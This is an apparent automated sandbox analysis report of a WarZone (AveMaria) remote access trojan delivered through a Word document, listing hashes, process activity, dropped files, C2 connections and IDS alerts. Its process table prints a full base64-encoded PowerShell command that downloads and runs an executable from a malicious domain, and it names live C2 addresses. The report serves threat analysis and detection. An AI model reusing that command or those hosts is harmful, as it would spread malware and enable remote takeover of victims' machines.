File name: | 4d13d3666215f6b8dc7ad90686688a3f(1).zip |
Full analysis: | https://app.any.run/tasks/25428c80-2ff5-4cd0-bdd6-99127989b092 |
Verdict: | Malicious activity |
Threats: | WarZone RAT is a remote access trojan, which is written in C++ and offered as a malware-as-a-service. It packs a wide range of capabilities, from stealing victims’ files and passwords to capturing desktop activities. WarZone RAT is primarily distributed via phishing emails and receives regular updates from its C2. |
Analysis date: | April 15, 2019, 07:26:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 88C7D41A5EC4AB9CBB7A4D4DA32B8380 |
SHA1: | BA3923B53547C6B14E7B700EB9CC8D860C667026 |
SHA256: | BD47B35469821A4567AACAC91EAD1B7ED247E61663473D8DC2CA6F7F0CA4A482 |
SSDEEP: | 48:9YL5P+dpVjwoV7rtby4m6fEflxH8WOJ0pD93cfj2kIwTZjeedLEgD0khDcy1epQd:ONaflb5fEfr40pZUUde5Rhp25jzCF/ |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 4d13d3666215f6b8dc7ad90686688a3f |
---|---|
ZipUncompressedSize: | 14081 |
ZipCompressedSize: | 3473 |
ZipCRC: | 0x3aad9773 |
ZipModifyDate: | 2019:04:15 10:11:28 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0009 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2172 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\4d13d3666215f6b8dc7ad90686688a3f(1).zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3820 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\4d13d3666215f6b8dc7ad90686688a3f.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2236 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2100 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvAC8AaAB1AG0AbwByAHIANQAuAHAAdwAvAGYAaQBsAGUALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAHYAbgBjAGgAbwBzAHQALgBlAHgAZQAiACkAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2352 | cmd /c %temp%\vnchost.exe | C:\Windows\system32\cmd.exe | — | WmiPrvSE.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2076 | C:\Users\admin\AppData\Local\Temp\vnchost.exe | C:\Users\admin\AppData\Local\Temp\vnchost.exe | cmd.exe | |
User: admin Company: Caterpillar Integrity Level: MEDIUM Description: Intentinal Hull Insert Exit code: 0 Version: 2.7.37.2 | ||||
2256 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | vnchost.exe | |
User: admin Company: Caterpillar Integrity Level: MEDIUM Description: Intentinal Hull Insert Version: 2.7.37.2 | ||||
2044 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1480 | "C:\Users\admin\AppData\Roaming\zAvKcnena.exe" | C:\Users\admin\AppData\Roaming\zAvKcnena.exe | images.exe | |
User: admin Company: Bandisoft Integrity Level: MEDIUM Description: Lampshades Atto Phone Prescribing Version: 1.1.18.399 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9279.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2100 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZSI378NGTEPPSBTSF0JX.temp | — | |
MD5:— | SHA256:— | |||
3820 | WINWORD.EXE | C:\Users\admin\Desktop\~$13d3666215f6b8dc7ad90686688a3f.doc | pgc | |
MD5:69764437F88331A86827ADA1155EF20D | SHA256:E89FD78FF8AAB093390D055B769FAEF9E8AF4C97A9E132B0E0AFCFE7F6921316 | |||
3820 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:208BD97EF712320CCE7FFF79F1E5750C | SHA256:8CFAD8A7CE82D2E7FEBC553699F5AC206F0F5DCFBBF0E47741F6B9214CD8767A | |||
2044 | explorer.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019041520190416\index.dat | dat | |
MD5:93AB91DA2E8F4334899EA62FA79B1E40 | SHA256:AACF0D0CD9619965288DB0F6E395282C6203818DF49A2D424096538A492E0A7C | |||
3820 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:C4F61C7BC3AAA14E48AC0053FA9D5FDD | SHA256:4BD1FDFB29E13521FC75C1CC6470C4E193D69FFA195687C68AE96CB24685D679 | |||
2172 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2172.19337\4d13d3666215f6b8dc7ad90686688a3f | text | |
MD5:4D13D3666215F6B8DC7AD90686688A3F | SHA256:4D8831712F5C4E8BF5FD15D3EC0E199651A01754D7614A14EB6A118223F2C9BB | |||
2044 | explorer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\4d13d3666215f6b8dc7ad90686688a3f.doc.lnk | lnk | |
MD5:13A07755897E886DCEC62623841C6AA8 | SHA256:36FE2D004636875833A6C30426EA1FE4D1E930BE6EA7EB907B3D52B90650FEF3 | |||
2256 | images.exe | C:\Users\admin\AppData\Roaming\.jBhsyD.tmp | — | |
MD5:— | SHA256:— | |||
2100 | powershell.exe | C:\Users\admin\AppData\Local\Temp\vnchost.exe | executable | |
MD5:695712CA4CA9DD0508E598BE9E8F842E | SHA256:D7C3F7DB5EFEEC9AEAE446CD96DAC4BCFDA0F5F0CFCEA21F0ABCAC714B286C1A |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2236 | EQNEDT32.EXE | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2256 | images.exe | 104.28.2.194:443 | humorr5.pw | Cloudflare Inc | US | shared |
2256 | images.exe | 194.68.59.48:2318 | — | Inleed AB | SE | suspicious |
1480 | zAvKcnena.exe | 194.68.59.48:8595 | — | Inleed AB | SE | suspicious |
2100 | powershell.exe | 104.28.2.194:443 | humorr5.pw | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
humorr5.pw |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile |
2256 | images.exe | A Network Trojan was detected | MALWARE [PTsecurity] AveMaria.RAT Encrypted Checkin |
2256 | images.exe | A Network Trojan was detected | MALWARE [PTsecurity] AveMaria.RAT Connection |
2256 | images.exe | Generic Protocol Command Decode | SURICATA STREAM excessive retransmissions |